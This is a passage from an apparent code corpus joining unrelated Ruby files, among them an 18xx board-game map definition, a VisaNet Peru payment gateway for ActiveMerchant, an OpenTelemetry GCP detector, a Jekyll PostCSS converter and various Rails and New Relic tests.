'code' => 'town=revenue:20;town=revenue:20;path=a:0,b:_0;path=a:3,b:_0;path=a:1,b:_1;path=a:2,b:_1;'\ 'path=a:4,b:5', }, '780_2b' => { 'count' => 3, 'color' => 'brown', 'hidden' => 1, 'code' => 'town=revenue:20;town=revenue:20;path=a:1,b:_0;path=a:2,b:_0;path=a:4,b:_1;path=a:5,b:_1;'\ 'path=a:0,b:3', }, '780_3' => { 'count' => 3, 'color' => 'brown', 'hidden' => 1, 'code' => 'town=revenue:20;town=revenue:20;town=revenue:20;path=a:1,b:_0;path=a:2,b:_0;'\ 'path=a:4,b:_1;path=a:5,b:_1;path=a:0,b:_2;path=a:3,b:_2', }, '790' => 4, '791' => 4, '792' => 2, '793' => 3, '794' => 3, '795' => { 'count' => 1, 'color' => 'brown', 'code' => 'city=revenue:80,slots:4;path=a:0,b:_0;path=a:1,b:_0;path=a:2,b:_0;path=a:4,b:_0;'\ 'path=a:5,b:_0;label=I', }, '796' => 3, '797' => { 'count' => 1, 'color' => 'brown', 'code' => 'city=revenue:60,slots:2;path=a:0,b:_0;path=a:1,b:_0;path=a:4,b:_0;label=H', }, '798' => 3, '798_1' => { 'count' => 3, 'color' => 'brown', 'hidden' => 1, 
'code' => 'town=revenue:20;path=a:0,b:_0;path=a:3,b:_0;path=a:1,b:4;path=a:2,b:5', }, '798_2' => { 'count' => 3, 'color' => 'brown', 'hidden' => 1, 'code' => 'town=revenue:20;town=revenue:20;path=a:0,b:_0;path=a:3,b:_0;path=a:1,b:_1;path=a:4,b:_1;'\ 'path=a:2,b:5', }, '798_3' => { 'count' => 3, 'color' => 'brown', 'hidden' => 1, 'code' => 'town=revenue:20;town=revenue:20;town=revenue:20;path=a:0,b:_0;path=a:3,b:_0;'\ 'path=a:1,b:_1;path=a:4,b:_1;path=a:2,b:_2;path=a:5,b:_2', }, '891y' => { 'count' => 3, 'color' => 'brown', 'code' => 'city=revenue:60,slots:2;path=a:0,b:_0;path=a:1,b:_0;path=a:2,b:_0;path=a:3,b:_0;label=Y', }, '8850' => { 'count' => 6, 'color' => 'yellow', 'code' => 'town=revenue:20;path=a:0,b:_0;path=a:5,b:_0', }, '8851' => { 'count' => 8, 'color' => 'yellow', 'code' => 'town=revenue:20;path=a:0,b:_0;path=a:4,b:_0', }, '8852' => { 'count' => 12, 'color' => 'yellow', 'code' => 'town=revenue:20;path=a:0,b:_0;path=a:3,b:_0', }, }.freeze LOCATION_NAMES = { 'A6' => 'Midlands', 'A10' => 'The West', 'E2' => 'Wells-Next-The-Sea', 'B3' => 'Holbeach', 'C4' => "King's Lynn", 'D3' => 'Hunstanton', 'E4' => 'Fakenham', 'F3' => 'Cromer', 'G4' => 'N Walsham', 'B5' => 'Wisbech', 'C6' => 'Downham Market', 'D5' => 'Swaffham', 'E6' => 'Watton', 'F5' => 'Norwich', 'G6' => 'Acle', 'H5' => 'Great Yarmouth', 'B7' => 'March', 'C8' => 'Ely', 'D7' => 'Brandon', 'E8' => 'Thetford', 'F7' => 'Diss', 'G8' => 'Beccles', 'H7' => 'Lowestoft', 'B9' => 'Cambridge', 'C10' => 'Newmarket', 'D9' => 'Bury St. Edmunds', 'E10' => 'Stowmarket', 'F9' => 'Framingham', 'G10' => 'Woodbridge', 'B11' => 'Royston', 'C12' => 'Great Dunmow', 'D11' => 'Sudbury', 'E12' => 'Colchester', 'F11' => 'Ipswitch', 'G12' => 'Felixstowe', 'B13' => "Bishop's Stortford", 'C14' => 'London', 'D13' => 'Witham', 'E14' => 'Tiptree', 'F13' => 'Harwich', }.freeze HEXES = { white: { # towns %w[ B3 D3 G4 E6 G6 D7 F9 E10 G10 B11 C12 ] => 'town=revenue:0', %w[ E14 ] => 'town=revenue:0;border=edge:4,type:impassable', # cities %w[ E2 F3 C4 E4 B5 D5 C6 B7 F7 H7 E8 G8 C10 D11 B13 D13 ] => 'city=revenue:0', %w[ F5 B9 E12 ] => 'city=revenue:0;label=N', %w[ H5 C8 D9 ] => 'city=revenue:0;label=Y', %w[ F11 ] => 'city=revenue:0;label=N;border=edge:0,type:impassable', %w[ G12 ] => 'city=revenue:0;border=edge:1,type:impassable', %w[ F13 ] => 'city=revenue:0;label=Y;border=edge:1,type:impassable;border=edge:3,type:impassable;'\ 'border=edge:4,type:impassable', }, blue: { %w[ E0 ] => 'offboard=revenue:yellow_80|green_90|brown_100,groups:North0;'\ 'border=edge:1;border=edge:5', %w[ D1 ] => 'offboard=revenue:yellow_80|green_90|brown_100,groups:North0,hide:1;path=a:5,b:_0;'\ 'border=edge:1,type:divider;border=edge:4', %w[ F1 ] => 'offboard=revenue:yellow_80|green_90|brown_100,groups:North0,hide:1;path=a:1,b:_0;'\ 'offboard=revenue:yellow_80|green_90|brown_100,groups:North1,hide:1;path=a:0,b:_1;'\ 'partition=a:1,b:4,type:divider;border=edge:2;border=edge:5', %w[ C2 ] => 'offboard=revenue:yellow_80|green_90|brown_100,groups:North;path=a:0,b:_0;'\ 'border=edge:4,type:divider', %w[ G2 ] => 'offboard=revenue:yellow_80|green_90|brown_100,groups:North1;border=edge:2', %w[ I4 ] => 'offboard=revenue:yellow_80|green_100|brown_120,groups:NorthEast;path=a:1,b:_0;'\ 'border=edge:0', %w[ I6 ] => 'offboard=revenue:yellow_80|green_100|brown_120,groups:NorthEast,hide:1;path=a:2,b:_0;'\ 'offboard=revenue:yellow_60|green_90|brown_120,groups:East,hide:1;path=a:1,b:_1;'\ 'partition=a:2,b:5,type:divider;border=edge:3;border=edge:0', %w[ I8 ] => 
'offboard=revenue:yellow_60|green_90|brown_120,groups:East;path=a:2,b:_0;'\ 'border=edge:3;border=edge:1', %w[ H9 ] => 'offboard=revenue:yellow_60|green_90|brown_120,groups:East,hide:1;path=a:3,b:_0;'\ 'border=edge:4;border=edge:0,type:divider', %w[ H11 ] => 'offboard=revenue:yellow_70|green_100|brown_130,groups:Denmark,hide:1;path=a:1,b:_0;'\ 'border=edge:0;border=edge:3,type:divider', %w[ H13 ] => 'offboard=revenue:yellow_70|green_100|brown_130,groups:Denmark;path=a:2,b:_0;'\ 'border=edge:3;border=edge:1', %w[ G14 ] => 'offboard=revenue:yellow_70|green_100|brown_130,groups:Denmark,hide:1;path=a:3,b:_0;'\ 'offboard=revenue:yellow_60|green_90|brown_120,groups:Holland,hide:1;path=a:2,b:_1;'\ 'border=edge:4;border=edge:1;partition=a:3,b:0,type:divider', %w[ F15 ] => 'offboard=revenue:yellow_70|green_100|brown_130,groups:Holland;path=a:3,b:_0;'\ 'border=edge:4', }, red: { %w[ A2 ] => 'offboard=revenue:yellow_40|green_90|brown_140,hide:1,groups:Midlands;path=a:5,b:_0;'\ 'border=edge:0', %w[ A4 ] => 'offboard=revenue:yellow_40|green_90|brown_140,hide:1,groups:Midlands;path=a:4,b:_0;path=a:5,b:_0;'\ 'border=edge:0;border=edge:3', %w[ A6 ] => 'offboard=revenue:yellow_40|green_90|brown_140,groups:Midlands;path=a:4,b:_0;path=a:5,b:_0;'\ 'border=edge:0;border=edge:3', %w[ A8 ] => 'offboard=revenue:yellow_40|green_90|brown_140,groups:Midlands,hide:1;path=a:4,b:_0;'\ 'offboard=revenue:yellow_70|green_100|brown_120,groups:West,hide:1;path=a:5,b:_1;'\ 'border=edge:0;border=edge:3;partition=a:2,b:5,type:divider', %w[ A10 ] => 'offboard=revenue:yellow_70|green_100|brown_120,groups:West;path=a:4,b:_0;path=a:5,b:_0;'\ 'border=edge:0;border=edge:3', %w[ A12 ] => 'offboard=revenue:yellow_100|green_150|brown_200,groups:London,hide:1;path=a:5,b:_0;'\ 'offboard=revenue:yellow_70|green_100|brown_120,groups:West,hide:1;path=a:4,b:_1;'\ 'border=edge:0;border=edge:3;partition=a:2,b:5,type:divider', %w[ A14 ] => 'offboard=revenue:yellow_100|green_150|brown_200,groups:London,hide:1;path=a:4,b:_0;'\ 'border=edge:5;border=edge:3', %w[ C14 ] => 'offboard=revenue:yellow_100|green_150|brown_200,groups:London;path=a:2,b:_0;path=a:3,b:_0;'\ 'path=a:4,b:_0;border=edge:5;border=edge:1', %w[ B15 ] => 'offboard=revenue:yellow_100|green_150|brown_200,groups:London,hide:1;path=a:3,b:_0;'\ 'border=edge:2;city=revenue:0,slots:2;border=edge:4', %w[ D15 ] => 'offboard=revenue:yellow_100|green_150|brown_200,groups:London,hide:1;path=a:3,b:_0;path=a:4,b:_0;'\ 'border=edge:2;city=revenue:0,slots:2', }, }.freeze LAYOUT = :flat end end end end
33.231933
117
0.396753
4a9cb78e1f2297058b7199e84f9133cba58b8294
756
# frozen_string_literal: true

# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# Auto-generated by gapic-generator-ruby. DO NOT EDIT!

module Google
  module Cloud
    module Metastore
      VERSION = "0.1.0"
    end
  end
end
28
74
0.744709
e9a8551bcae307ebb055257ea87ee73d42d7913b
176
class CreateTipos < ActiveRecord::Migration[5.0]
  def change
    create_table :tipos do |t|
      t.string :nome
      t.text :descricao

      t.timestamps
    end
  end
end
16
48
0.642045
ed1af7cde0654aac5298c7b652346790a14cf876
2,636
# frozen_string_literal: true

# Copyright The OpenTelemetry Authors
#
# SPDX-License-Identifier: Apache-2.0

require 'google-cloud-env'

module OpenTelemetry
  module Resource
    module Detectors
      # GoogleCloudPlatform contains detect class method for determining gcp environment resource attributes
      module GoogleCloudPlatform
        extend self

        def detect # rubocop:disable Metrics/AbcSize, Metrics/CyclomaticComplexity, Metrics/MethodLength
          gcp_env = Google::Cloud::Env.new
          resource_attributes = {}

          if gcp_env.compute_engine?
            resource_attributes[OpenTelemetry::SemanticConventions::Resource::CLOUD_PROVIDER] = 'gcp'
            resource_attributes[OpenTelemetry::SemanticConventions::Resource::CLOUD_ACCOUNT_ID] = gcp_env.project_id
            resource_attributes[OpenTelemetry::SemanticConventions::Resource::CLOUD_REGION] = gcp_env.instance_attribute('cluster-location')
            resource_attributes[OpenTelemetry::SemanticConventions::Resource::CLOUD_AVAILABILITY_ZONE] = gcp_env.instance_zone
            resource_attributes[OpenTelemetry::SemanticConventions::Resource::HOST_ID] = gcp_env.lookup_metadata('instance', 'id')
            resource_attributes[OpenTelemetry::SemanticConventions::Resource::HOST_NAME] = ENV['HOSTNAME'] || gcp_env.lookup_metadata('instance', 'hostname') || safe_gethostname
          end

          if gcp_env.kubernetes_engine?
            resource_attributes[OpenTelemetry::SemanticConventions::Resource::K8S_CLUSTER_NAME] = gcp_env.instance_attribute('cluster-name')
            resource_attributes[OpenTelemetry::SemanticConventions::Resource::K8S_NAMESPACE_NAME] = gcp_env.kubernetes_engine_namespace_id
            resource_attributes[OpenTelemetry::SemanticConventions::Resource::K8S_POD_NAME] = ENV['HOSTNAME'] || safe_gethostname
            resource_attributes[OpenTelemetry::SemanticConventions::Resource::K8S_NODE_NAME] = gcp_env.lookup_metadata('instance', 'hostname')
            resource_attributes[OpenTelemetry::SemanticConventions::Resource::CONTAINER_NAME] = ENV['CONTAINER_NAME']
          end

          resource_attributes.delete_if { |_key, value| value.nil? || value.empty? }

          OpenTelemetry::SDK::Resources::Resource.create(resource_attributes)
        end

        private

        def safe_gethostname
          Socket.gethostname
        rescue StandardError
          ''
        end
      end
    end
  end
end
47.071429
142
0.67868
87085cf479f1287ba159f5d633706358ad73530c
634
module ActionView
  module Helpers
    module AssetTagHelper
      def image_tag_with_retina(source, options={})
        retina = options.delete(:retina)

        if retina
          retina_source = source.to_s
          retina_source = retina_source.split('.')
          filename = retina_source.slice!(-2)
          retina_source = retina_source.insert(-2, "#{filename}@2x").join('.')

          options[:data] ||= {}
          options[:data].merge!(:at2x => path_to_image(retina_source))
        end

        image_tag_without_retina(source, options)
      end

      alias_method_chain :image_tag, :retina
    end
  end
end
25.36
78
0.613565
7ab588f5a6d69f44b79150a7139d690499fe5e93
701
require 'test_helper'

class MicropostTest < ActiveSupport::TestCase

  def setup
    @user = users(:john)
    @micropost = @user.microposts.build(content: "Lorem ipsum")
  end

  test "should be valid" do
    assert @micropost.valid?
  end

  test "user id should be present" do
    @micropost.user_id = nil
    assert_not @micropost.valid?
  end

  test "content should be present " do
    @micropost.content = " "
    assert_not @micropost.valid?
  end

  test "content should be at most 140 characters" do
    @micropost.content = "a" * 141
    assert_not @micropost.valid?
  end

  test "order should be most recent first" do
    assert_equal Micropost.first, microposts(:most_recent)
  end
end
21.90625
63
0.693295
e874263f99b85dffbecfeac6824828a1ec9334bb
1,675
# frozen_string_literal: true

require "digest"
require_relative "../../jekyll-postcss/socket"

module Jekyll
  module Converters
    class PostCss < Converter
      safe true
      priority :normal

      def initialize(config = {})
        super

        @socket = config.fetch("socket") { ::PostCss::Socket.new }
        @raw_cache = nil
        @import_raw_cache = {}
        @converted_cache = nil
      end

      def matches(ext)
        [".css", ".scss", ".sass"].include?(ext.downcase)
      end

      def output_ext(ext)
        ext
      end

      def convert(content)
        raise PostCssNotFoundError unless Dir.exist?("./node_modules/postcss")

        @raw_digest = Digest::MD5.hexdigest content
        @raw_import_digests = import_digests(content)

        if cache_miss.any?
          @raw_cache = @raw_digest.dup
          @import_raw_cache = @raw_import_digests.dup

          @socket.write content
          @converted_cache = @socket.read
        end

        reset

        @converted_cache
      end

      private

      def import_digests(content)
        content
          .scan(%r!^@import "(?<file>.*)";$!)
          .flatten
          .each_with_object({}) do |import, acc|
            file = "#{import}.css"
            acc[import] = Digest::MD5.hexdigest IO.read(file) if File.file?(file)
          end
      end

      def cache_miss
        @raw_import_digests
          .map { |import, hash| @import_raw_cache[import] != hash }
          .unshift(@raw_cache != @raw_digest)
      end

      def reset
        @raw_digest = nil
        @raw_import_digest = nil
      end
    end
  end
end

class PostCssNotFoundError < RuntimeError; end
22.039474
81
0.575522
26bf0ec918b29f0627786ce66bd3ec67e7580644
158
def sign_in_as(user)
  visit new_user_session_path

  fill_in 'Email', with: user.email
  fill_in 'Password', with: user.password

  click_button 'Sign in'
end
22.571429
41
0.759494
28b6620d91a3416978dbd56c6c34bbfaafa4b4f9
1,346
require 'spec_helper'

describe 'duo_unix::repo' do
  on_supported_os.each do |os, os_facts|
    context "on #{os}" do
      let(:facts) { os_facts }

      it { is_expected.to compile.with_all_deps }

      if os =~ %r{/ubuntu.*/}
        if os != 'ubuntu-18.04-x86_64'
          it {
            is_expected.to contain_apt__source('duosecurity')
              .with_location('https://pkg.duosecurity.com/Ubuntu')
              .with_architecture('i386,amd64')
          }
        end

        if os == 'ubuntu-18.04-x86_64'
          it {
            is_expected.to contain_apt__source('duosecurity')
              .with_location('https://pkg.duosecurity.com/Ubuntu')
              .with_release('bionic')
              .with_repos('main')
              .with_architecture('amd64')
          }
        end
      end

      if os =~ %r{/debian.*/}
        it { is_expected.to contain_apt__source('duosecurity').with_location('https://pkg.duosecurity.com/Debian') }
      end

      if os =~ %r{/redhat.*/}
        it { is_expected.to contain_yumrepo('duosecurity').with_baseurl('https://pkg.duosecurity.com/RedHat/$releasever/$basearch') }
      end

      if os =~ %r{/centos.*/}
        it { is_expected.to contain_yumrepo('duosecurity').with_baseurl('https://pkg.duosecurity.com/CentOS/$releasever/$basearch') }
      end
    end
  end
end
29.26087
133
0.580981
d5f27a63ef9d52207598d9c913adc0f0f5a41e75
8,640
module ActiveMerchant #:nodoc: module Billing #:nodoc: class VisanetPeruGateway < Gateway include Empty self.display_name = 'VisaNet Peru Gateway' self.homepage_url = 'http://www.visanet.com.pe' self.test_url = 'https://devapi.vnforapps.com/api.tokenization/api/v2/merchant' self.live_url = 'https://api.vnforapps.com/api.tokenization/api/v2/merchant' self.supported_countries = ['US', 'PE'] self.default_currency = 'PEN' self.money_format = :dollars self.supported_cardtypes = [:visa, :master, :american_express, :discover] def initialize(options={}) requires!(options, :access_key_id, :secret_access_key, :merchant_id) super end def purchase(amount, payment_method, options={}) MultiResponse.run() do |r| r.process { authorize(amount, payment_method, options) } r.process { capture(amount, r.authorization, options) } end end def authorize(amount, payment_method, options={}) params = {} add_invoice(params, amount, options) add_payment_method(params, payment_method) add_antifraud_data(params, options) params[:email] = options[:email] || '[email protected]' params[:createAlias] = false commit('authorize', params, options) end def capture(amount, authorization, options={}) params = {} options[:id_unico] = split_authorization(authorization)[1] add_auth_order_id(params, authorization, options) commit('deposit', params, options) end def void(authorization, options={}) params = {} add_auth_order_id(params, authorization, options) commit('void', params, options) end def refund(amount, authorization, options={}) params = {} params[:amount] = amount(amount) if amount add_auth_order_id(params, authorization, options) response = commit('cancelDeposit', params, options) return response if response.success? || split_authorization(authorization).length == 1 || !options[:force_full_refund_if_unsettled] # Attempt RefundSingleTransaction if unsettled (and stash the original # response message so it will be included it in the follow-up response # message) options[:error_message] = response.message prepare_refund_data(params, authorization, options) commit('refund', params, options) end def verify(credit_card, options={}) MultiResponse.run(:use_first_response) do |r| r.process { authorize(100, credit_card, options) } r.process(:ignore_result) { void(r.authorization, options) } end end def supports_scrubbing? true end def scrub(transcript) transcript. gsub(%r((Authorization: Basic )\w+), '\1[FILTERED]'). gsub(%r((\"cardNumber\\\":\\\")\d+), '\1[FILTERED]'). 
gsub(%r((\"cvv2Code\\\":\\\")\d+), '\1[FILTERED]') end private CURRENCY_CODES = Hash.new { |h, k| raise ArgumentError.new("Unsupported currency: #{k}") } CURRENCY_CODES['USD'] = 840 CURRENCY_CODES['PEN'] = 604 def add_invoice(params, money, options) # Visanet Peru expects a 9-digit numeric purchaseNumber params[:purchaseNumber] = (SecureRandom.random_number(900_000_000) + 100_000_000).to_s params[:externalTransactionId] = options[:order_id] params[:amount] = amount(money) params[:currencyId] = CURRENCY_CODES[options[:currency] || currency(money)] end def add_auth_order_id(params, authorization, options) purchase_number, _ = split_authorization(authorization) params[:purchaseNumber] = purchase_number params[:externalTransactionId] = options[:order_id] end def add_payment_method(params, payment_method) params[:firstName] = payment_method.first_name params[:lastName] = payment_method.last_name params[:cardNumber] = payment_method.number params[:cvv2Code] = payment_method.verification_value params[:expirationYear] = format(payment_method.year, :four_digits) params[:expirationMonth] = format(payment_method.month, :two_digits) end def add_antifraud_data(params, options) antifraud = {} if billing_address = options[:billing_address] || options[:address] antifraud[:billTo_street1] = billing_address[:address1] antifraud[:billTo_city] = billing_address[:city] antifraud[:billTo_state] = billing_address[:state] antifraud[:billTo_country] = billing_address[:country] antifraud[:billTo_postalCode] = billing_address[:zip] end antifraud[:deviceFingerprintId] = options[:device_fingerprint_id] || SecureRandom.hex(16) antifraud[:merchantDefineData] = options[:merchant_define_data] if options[:merchant_define_data] params[:antifraud] = antifraud end def prepare_refund_data(params, authorization, options) params.delete(:purchaseNumber) params[:externalReferenceId] = params.delete(:externalTransactionId) _, transaction_id = split_authorization(authorization) options.update(transaction_id: transaction_id) params[:ruc] = options[:ruc] end def split_authorization(authorization) authorization.split('|') end def commit(action, params, options={}) raw_response = ssl_request(method(action), url(action, params, options), params.to_json, headers) response = parse(raw_response) rescue ResponseError => e raw_response = e.response.body response_error(raw_response, options, action) rescue JSON::ParserError unparsable_response(raw_response) else Response.new( success_from(response), message_from(response, options, action), response, :test => test?, :authorization => authorization_from(params, response, options), :error_code => response['errorCode'] ) end def headers { 'Authorization' => 'Basic ' + Base64.strict_encode64("#{@options[:access_key_id]}:#{@options[:secret_access_key]}").strip, 'Content-Type' => 'application/json' } end def url(action, params, options={}) if action == 'authorize' "#{base_url}/#{@options[:merchant_id]}" elsif action == 'refund' "#{base_url}/#{@options[:merchant_id]}/#{action}/#{options[:transaction_id]}" else "#{base_url}/#{@options[:merchant_id]}/#{action}/#{params[:purchaseNumber]}" end end def method(action) %w(authorize refund).include?(action) ? :post : :put end def authorization_from(params, response, options) id_unico = response['data']['ID_UNICO'] || options[:id_unico] "#{params[:purchaseNumber]}|#{id_unico}" end def base_url test? ? 
test_url : live_url end def parse(body) JSON.parse(body) end def success_from(response) response['errorCode'] == 0 end def message_from(response, options, action) message_from_messages( response['errorMessage'], action_code_description(response), options[:error_message] ) end def message_from_messages(*args) args.reject { |m| error_message_empty?(m) }.join(' | ') end def action_code_description(response) return nil unless response['data'] response['data']['DSC_COD_ACCION'] end def error_message_empty?(error_message) empty?(error_message) || error_message == '[ ]' end def response_error(raw_response, options, action) response = parse(raw_response) rescue JSON::ParserError unparsable_response(raw_response) else return Response.new( false, message_from(response, options, action), response, :test => test?, :authorization => response['transactionUUID'], :error_code => response['errorCode'] ) end def unparsable_response(raw_response) message = 'Invalid JSON response received from VisanetPeruGateway. Please contact VisanetPeruGateway if you continue to receive this message.' message += " (The raw response returned by the API was #{raw_response.inspect})" return Response.new(false, message) end end end end
34.979757
150
0.636574
e979a39f833d9e034cd9ef34ce0ace39445286fe
387
# frozen_string_literal: true

require 'forwardable'
require_relative 'utils'

module OpenapiFirst
  # Represents an OpenAPI Response Object
  class ResponseObject
    extend Forwardable

    def_delegators :@parsed, :content
    def_delegators :@raw, :[]

    def initialize(parsed)
      @parsed = parsed
      @raw = parsed.raw
    end
  end
end
17.590909
41
0.638243
21bb707df71ba758ecfd257d2603ad82d162020b
75
class EvidenceType < ApplicationRecord
  validates_presence_of :title
end
15
38
0.84
082ba48aa6c5129b5f14895924a0bfb7d99a99fc
47
module StellarSpectrum
  VERSION = "1.3.1"
end
11.75
22
0.723404
0322b82cc78922ca3f577762a7b10300cf954c6a
15,946
require File.expand_path(File.join(File.dirname(__FILE__),'..','..','test_helper')) require 'action_controller/test_case' class NewRelic::Agent::AgentTestControllerTest < ActionController::TestCase require 'action_controller/base' require 'new_relic/agent/agent_test_controller' self.controller_class = NewRelic::Agent::AgentTestController attr_accessor :agent, :engine def test_initialization # Suggested by cee-dub for merb tests. I'm actually amazed if our tests work with merb. if defined?(Merb::Router) Merb::Router.prepare do |r| match('/:controller(/:action)(.:format)').register end elsif NewRelic::Control.instance.rails_version < NewRelic::VersionNumber.new("3.0") ActionController::Routing::Routes.draw do |map| map.connect '/:controller/:action.:format' map.connect '/:controller/:action' end else Rails.application.routes.draw do match '/:controller/:action.:format' match '/:controller/:action' end end if defined?(Rails) && Rails.respond_to?(:application) && Rails.application.respond_to?(:routes) @routes = Rails.application.routes end Thread.current[:newrelic_ignore_controller] = nil NewRelic::Agent.manual_start @agent = NewRelic::Agent.instance # @agent.instrument_app agent.transaction_sampler.harvest NewRelic::Agent::AgentTestController.class_eval do newrelic_ignore :only => [:action_to_ignore, :entry_action, :base_action] newrelic_ignore_apdex :only => :action_to_ignore_apdex end @engine = @agent.stats_engine end # Normally you can do this with #setup but for some reason in rails 2.0.2 # setup is not called. if NewRelic::Control.instance.rails_version <= '2.1.0' def initialize name super name test_initialization end else alias_method :setup, :test_initialization end def teardown Thread.current[:newrelic_ignore_controller] = nil NewRelic::Agent.shutdown NewRelic::Agent::AgentTestController.clear_headers super end def test_mongrel_queue NewRelic::Agent::AgentTestController.clear_headers engine.clear_stats NewRelic::Control.instance.local_env.stubs(:mongrel).returns( stub('mongrel', :workers => stub('workers', :list => stub('list', :length => '10')))) get :index assert_equal 1, stats('HttpDispatcher').call_count assert_equal 1, engine.get_stats_no_scope('Mongrel/Queue Length').call_count assert_equal 9, engine.get_stats_no_scope('Mongrel/Queue Length').total_call_time assert_equal 0, engine.get_stats_no_scope('WebFrontend/Mongrel/Average Queue Time').call_count end def test_heroku_queue engine.clear_stats NewRelic::Agent::AgentTestController.set_some_headers 'HTTP_X_HEROKU_QUEUE_DEPTH'=>'15' get :index assert_equal 1, stats('HttpDispatcher').call_count assert_equal 1, engine.get_stats_no_scope('Mongrel/Queue Length').call_count assert_equal 15, engine.get_stats_no_scope('Mongrel/Queue Length').total_call_time assert_equal 0, engine.get_stats_no_scope('WebFrontend/Mongrel/Average Queue Time').call_count end def test_new_queue_integration # make this test deterministic Time.stubs(:now => Time.at(2)) NewRelic::Agent::AgentTestController.clear_headers engine.clear_stats start = ((Time.now - 1).to_f * 1_000_000).to_i NewRelic::Agent::AgentTestController.set_some_headers 'HTTP_X_QUEUE_START'=> "t=#{start}" get :index check_metric_time('WebFrontend/QueueTime', 1, 0.1) end def test_new_middleware_integration # make this test deterministic Time.stubs(:now => Time.at(2)) engine.clear_stats start = ((Time.now - 1).to_f * 1_000_000).to_i NewRelic::Agent::AgentTestController.set_some_headers 'HTTP_X_MIDDLEWARE_START'=> "t=#{start}" get :index check_metric_time('Middleware/all', 1, 0.1) end def 
test_new_server_time_integration # make this test deterministic Time.stubs(:now => Time.at(2)) NewRelic::Agent::AgentTestController.clear_headers engine.clear_stats start = ((Time.now - 1).to_f * 1_000_000).to_i NewRelic::Agent::AgentTestController.set_some_headers 'HTTP_X_REQUEST_START'=> "t=#{start}" get :index check_metric_time('WebFrontend/WebServer/all', 1, 0.1) end def test_new_frontend_work_integration # make this test deterministic Time.stubs(:now => Time.at(10)) engine.clear_stats times = [Time.now - 3, Time.now - 2, Time.now - 1] times.map! {|t| (t.to_f * 1_000_000).to_i } NewRelic::Agent::AgentTestController.set_some_headers({ 'HTTP_X_REQUEST_START'=> "t=#{times[0]}", 'HTTP_X_QUEUE_START' => "t=#{times[1]}", 'HTTP_X_MIDDLEWARE_START' => "t=#{times[2]}"}) get :index check_metric_time('WebFrontend/WebServer/all', 1, 0.1) check_metric_time('Middleware/all', 1, 0.1) check_metric_time('WebFrontend/QueueTime', 1, 0.1) end def test_render_inline engine.clear_stats get :action_inline assert_equal 'foofah', @response.body compare_metrics %w[Controller/new_relic/agent/agent_test/action_inline], engine.metrics.grep(/^Controller/) end def test_metric__ignore engine.clear_stats compare_metrics [], engine.metrics get :action_to_ignore compare_metrics [], engine.metrics end def test_controller_rescued_error engine.clear_stats assert_raise RuntimeError do get :action_with_error end metrics = ['Apdex', 'Apdex/new_relic/agent/agent_test/action_with_error', 'HttpDispatcher', 'Controller/new_relic/agent/agent_test/action_with_error', 'Errors/all', 'Middleware/all', 'WebFrontend/WebServer/all', 'WebFrontend/QueueTime'] compare_metrics metrics, engine.metrics.reject{|m| m.index('Response')==0 || m.index('CPU')==0} assert_equal 1, engine.get_stats_no_scope("Controller/new_relic/agent/agent_test/action_with_error").call_count assert_equal 1, engine.get_stats_no_scope("Errors/all").call_count apdex = engine.get_stats_no_scope("Apdex") score = apdex.get_apdex assert_equal 1, score[2], 'failing' assert_equal 0, score[1], 'tol' assert_equal 0, score[0], 'satisfied' end def test_controller_error engine.clear_stats assert_raise RuntimeError do get :action_with_error end metrics = ['Apdex', 'Apdex/new_relic/agent/agent_test/action_with_error', 'HttpDispatcher', 'Controller/new_relic/agent/agent_test/action_with_error', 'Errors/all', 'WebFrontend/QueueTime', 'Middleware/all', 'WebFrontend/WebServer/all'] compare_metrics metrics, engine.metrics.reject{|m| m.index('Response')==0 || m.index('CPU')==0} assert_equal 1, engine.get_stats_no_scope("Controller/new_relic/agent/agent_test/action_with_error").call_count assert_equal 1, engine.get_stats_no_scope("Errors/all").call_count apdex = engine.get_stats_no_scope("Apdex") score = apdex.get_apdex assert_equal 1, score[2], 'failing' assert_equal 0, score[1], 'tol' assert_equal 0, score[0], 'satisfied' end def test_filter_error engine.clear_stats assert_raise RuntimeError do get :action_with_before_filter_error end metrics = ['Apdex', 'Apdex/new_relic/agent/agent_test/action_with_before_filter_error', 'HttpDispatcher', 'Controller/new_relic/agent/agent_test/action_with_before_filter_error', 'Errors/all', 'WebFrontend/QueueTime', 'Middleware/all', 'WebFrontend/WebServer/all'] compare_metrics metrics, engine.metrics.reject{|m| m.index('Response')==0 || m.index('CPU')==0 || m.index('GC')==0} assert_equal 1, engine.get_stats_no_scope("Controller/new_relic/agent/agent_test/action_with_before_filter_error").call_count assert_equal 1, 
engine.get_stats_no_scope("Errors/all").call_count apdex = engine.get_stats_no_scope("Apdex") score = apdex.get_apdex assert_equal 1, score[2], 'failing' assert_equal 0, score[1], 'tol' assert_equal 0, score[0], 'satisfied' end def test_metric__ignore_base engine.clear_stats get :base_action compare_metrics [], engine.metrics end def test_metric__no_ignore path = 'new_relic/agent/agent_test/index' index_stats = stats("Controller/#{path}") index_apdex_stats = engine.get_custom_stats("Apdex/#{path}", NewRelic::ApdexStats) assert_difference 'index_stats.call_count' do assert_difference 'index_apdex_stats.call_count' do get :index end end assert_nil Thread.current[:newrelic_ignore_controller] end def test_metric__ignore_apdex engine = @agent.stats_engine path = 'new_relic/agent/agent_test/action_to_ignore_apdex' cpu_stats = stats("ControllerCPU/#{path}") index_stats = stats("Controller/#{path}") index_apdex_stats = engine.get_custom_stats("Apdex/#{path}", NewRelic::ApdexStats) assert_difference 'index_stats.call_count' do assert_no_difference 'index_apdex_stats.call_count' do get :action_to_ignore_apdex end end assert_nil Thread.current[:newrelic_ignore_controller] end def test_metric__dispatched engine = @agent.stats_engine get :entry_action assert_nil Thread.current[:newrelic_ignore_controller] assert_nil engine.lookup_stats('Controller/agent_test/entry_action') assert_nil engine.lookup_stats('Controller/agent_test_controller/entry_action') assert_nil engine.lookup_stats('Controller/AgentTestController/entry_action') assert_nil engine.lookup_stats('Controller/NewRelic::Agent::AgentTestController/internal_action') assert_nil engine.lookup_stats('Controller/NewRelic::Agent::AgentTestController_controller/internal_action') assert_not_nil engine.lookup_stats('Controller/NewRelic::Agent::AgentTestController/internal_traced_action') end def test_action_instrumentation get :index, :foo => 'bar' assert_match /bar/, @response.body end def test_controller_params assert agent.transaction_sampler num_samples = NewRelic::Agent.instance.transaction_sampler.samples.length assert_equal "[FILTERED]", @controller._filter_parameters({'social_security_number' => 'test'})['social_security_number'] get :index, 